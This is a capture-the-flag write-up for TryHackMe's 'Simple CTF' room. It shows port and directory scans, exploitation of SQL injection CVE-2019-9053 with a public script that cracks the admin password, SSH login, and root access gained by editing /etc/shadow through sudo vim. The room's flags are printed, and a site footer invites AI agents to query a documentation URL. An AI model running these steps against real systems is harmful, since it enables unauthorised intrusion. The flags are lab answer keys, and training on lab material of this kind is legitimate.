# TryHackMe "Simple CTF"
Logo

Logo

## Introduction [Simple CTF](https://tryhackme.com/room/easyctf) is an easy room released on August 18th, 2019 by MrSeth6797. ## User Own ### How many services are running under port 1000? Nmap scan: ``` Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:39 EDT Nmap scan report for 10.10.xx.xx Host is up (0.11s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.6.xx.xx | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 2 disallowed entries |_/ /openemr-5_0_1_3 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 294269149ecad917988c27723acda923 (RSA) | 256 9bd165075108006198de95ed3ae3811c (ECDSA) |_ 256 12651b61cf4de575fef4e8d46e102af6 (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 46.04 seconds ``` There are **2** services running under port 1000, those being FTP on port 21 and HTTP on port 80. ### What is running on the higher port? The highest port is port 2222, with **SSH** communicating on that port. ### What's the CVE you're using against the application? Running `ffuf` to find subdirectories: ``` ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.46.102/FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : GET :: URL : http://10.10.xx.xx/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 104ms] * FUZZ: .htaccess [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 3131ms] * FUZZ: .htpasswd [Status: 200, Size: 929, Words: 176, Lines: 33, Duration: 103ms] * FUZZ: robots.txt [Status: 403, Size: 300, Words: 22, Lines: 12, Duration: 103ms] * FUZZ: server-status [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 103ms] * FUZZ: simple :: Progress: [20476/20476] :: Job [1/1] :: 390 req/sec :: Duration: [0:00:55] :: Errors: 0 :: ``` Going to `http://10.10.xx.xx/simple/` shows the system is running CMS Made Simple.
http://10.10.46.102/simple/

http://10.10.xx.xx/simple

The bottom of the page reveals the version of CMSMS to be 2.2.8. This version of CMSMS is vulnerable to **CVE-2019-9053**. ### To what kind of vulnerability is the application vulnerable? The description of CVE-2019-9053: > An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1\_idlist parameter. CVE-2019-9053 uses SQL injection, also known as **SQLi**. ### What's the password? Using [this Python script](https://github.com/e-renna/CVE-2019-9053) utilizing CVE-2019-9053, we can extract the salt, username, email, and password of the system. ``` python3 exploit.py -u http://10.10.xx.xx/simple --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt [+] Salt for password found: 1dac0d92e9fa6bb2 [+] Username found: mitch [+] Email found: admin@admin.com [+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96 [+] Password cracked: secret ``` The Python script determines the password to be **`secret`**. ### Where can you login with the details obtained? Password reuse is common, and the password obtained from before can be reused for **SSH**. ### What's the user flag? The user flag is located in `mitch`'s home directory. ``` ssh mitch@10.10.xx.xx -p 2222 mitch@10.10.xx.xx's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Sat Apr 22 05:25:10 2023 from 10.6.xx.xx $ ls user.txt $ cat user.txt G00d j0b, keep up! ``` Inside `user.txt` is the user flag, **`G00d j0b, keep up!`** ## System Own ### Is there any other user in the home directory? What's its name? Looking at the `/home` directory shows another user, **`sunbath`**. ### What can you leverage to spawn a privileged shell? Using `sudo -l`: ``` User mitch may run the following commands on Machine: (root) NOPASSWD: /usr/bin/vim ``` We can run **Vim** as `root`. If we can edit anything as `root`, we can change the password of a privileged user in `/etc/shadow` to login as them. Using `mkpasswd -5` will create a password from input encrypted with md5crypt in a format acceptible by `/etc/shadow`. We can replace the password for `sunbath` with the newly created password. ``` mkpasswd -5 Password: secret $1$6o0881Hj$FE4pytde84UUirtTspp0r. ``` `sunbath`'s current password in `/etc/shadow` can be replaced with the newly generated password with `sudo vim /etc/shadow`. {% code title="/etc/shadow" %} ``` sunbath:$1$4fbrKI.j$er0GLgKxiXt8L87lHw2Tw1:18125:0:99999:7::: ``` {% endcode %} `sunbath` can then be logged in with `su sunbath`. ### What's the root flag? The root flag is located in `/root`. ``` sudo cat /root/root.txt [sudo] password for sunbath: W3ll d0n3. You made it! ``` Inside `root.txt` is the root flag, **`W3ll d0n3. You made it!`**. And that's the room! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook.bennettcl.app/write-ups/tryhackme-simple-ctf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.